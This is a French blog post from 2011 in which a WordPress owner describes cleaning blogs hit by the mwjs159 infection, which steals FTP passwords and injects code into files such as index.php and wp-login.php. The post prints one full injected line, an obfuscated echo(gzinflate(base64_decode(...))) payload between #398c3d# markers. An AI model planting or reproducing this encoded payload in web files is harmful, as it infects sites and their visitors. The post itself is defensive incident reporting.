Comment supprimer le virus mwjs159 sur votre blog WordPress
Hier soir un client m’a alerté: son anti-virus affichait une mise en garde quand il visitait un de mes blogs.
Après vérification je me suis rendu compte que tous mes autres blogs situés sur ce même hébergement étaient infectés.
Un coup de scan rapide avec le site http://sitecheck.sucuri.net/scanner/ m’a informé que mon blog avait été victime du virus mwjs159.
Selon les informations disponibles à l’heure actuelle, le virus mwjs159 infecte des ordinateurs, vole les mots de passe FTP stockés sur ces ordinateurs et injecte ensuite du code malveillant sur tous les sites situés sur les serveurs FTPs dont il a récupéré les mots de passe.
Décidément, de nos jours les hackers sont de plus en plus tordus !
Après avoir réalisé un scan complet de ma machine et de celle de mes collaborateurs je me suis connecté par FTP et j’ai regardé les dates de modification des fichiers.
Dans le répertoire principal, les fichiers WordPress index.php, pieddepage.php, wp-blog-header.php et wp-login.php avaient été modifiés à 22h33 hier soir, alors même que je ne m’étais pas connecté par à ce moment-là, c’est donc le virus qui avait du effectuer ces opérations malicieuses.
En ouvrant les fichiers en question j’ai trouvé des lignes de ce type:
#398c3d# echo(gzinflate(base64_decode("7Vhdb5swFP0rGapkPJoM8xUQ9V665/Vhe4vyQANpmBrowGlaVfnvM7YZ14W0SdNp0jSp2LV9fX3use8x5KJeVPkd+3xNi2w7Wm6KBcvLwsRPVcY2VTFy4l2cL80P1jX+xqq8uJncVSUr2eNdNmFZzShaJdUlipdlZeajvBidUZTV1arOqhXCfGZOKWIZslDNEF7Ts1k+j1n1+NQsd3X9I1swE0+22Yr/mTjeLRK2WJk/8VNdU8OId43pNi/ScjtDjZd7/iS3aG6ipE6TGmEwg0qEM2NZGZZRri8Na83r1LD41Hm8S0WMXxKW8ZVSp2ulk/vkdpNdLU08dnAsYYFA+VI8KtQQ8bQTLdq0cULTcrFZZwWboQUHViFLgEz4w9T/31X9oPq+8qfkTyr6eRyuQxBuXCeTNGEJpbwDP9Ax+Wim45TDKehs/GBNz9uC2K6s7KZyZRk2ZRTKgUg0pDHxZZ9oRZFsSDviNZXnyT4CDORIoJYL4NS9fggRsALVEBahI6x9sMI0gF3AmwzBlT0BDCQEHuW4K72L0pMOSddPHHKuMTZAGyHOHhxqRMERXf5zV47bUd9yEQASVET2fjSnbBWZApxtWNJCo1KM++ExwSvIxIVmYtwH9BPb0TZeVWKuL3jw/K5sqbE9CFtNkgTIwBQNNjxpykULyNcWBFG0S7mANd0rAQYB6fagJdoGlBANuFxOnTwbboH0FmlpILmBdHnT7pxqXqRpC8DVcEKWDnJGXI2bqJe72g6SQDs8LgxHG7KD/ilT3v0AQoVc6MyGXQ6pQ9LusbbubwJd7RiE3VJyd6JAm6unn99LBn9IxWzIbtAx2qL0NJT2sJmkMrC7NHt2Cl9JNjlTpumLQgNFzNYOaAjlYz997Xl7swLukVQCxVzNsnuXkw+k5QTdi6DsSbOov93HXVrw0jlYI6fPN0xN8bzeFdDepO6QXjr9pBs4vxrEAWFWsuD8l+cDduUFeWzt3kMYB+7KV+RRGp8E/I3KCrC+SV9PR/6CNMOLL3gnnoa0/eh1/lB6v/Za0U/2gfeBv6JMh77LHBvBO743/xOfOEo1fZjzxO4hlh4Dvy9BbbBhh6i9rfe9g8zl5z214/yimNxmxQ1bxbll4bq2aG1m/OvZNAr+zT3LeTE3MI5FX13j+OKT+oXhFw=="))); #/398c3d#
J’ai donc enlevé toutes ces lignes et refait un scan pour m’assurer que mes blogs n’étaient plus compromis.
A noter que le virus infecte également les fichiers situés dans les sous-répertoires donc il faut les ouvrir un par un et trier les fichiers par date de dernière modification pour trouver les fichiers infectés et les nettoyer.
Est-ce que vous avez également été infecté par le virus mwjs159 ? Laissez un commentaire pour raconter comment vous en êtes venu à bout
Aurélien Amacker Reply:
septembre 24th, 2011 at 16 h 20 min
Avast antivirus par exemple te signale des sites malveillants puisqu’il détecte des tentatives d’intrusion sur ton ordinateur.
[Reply]
Grégory Marchal Reply:
septembre 27th, 2011 at 11 h 34 min
OK. Merci !
[Reply]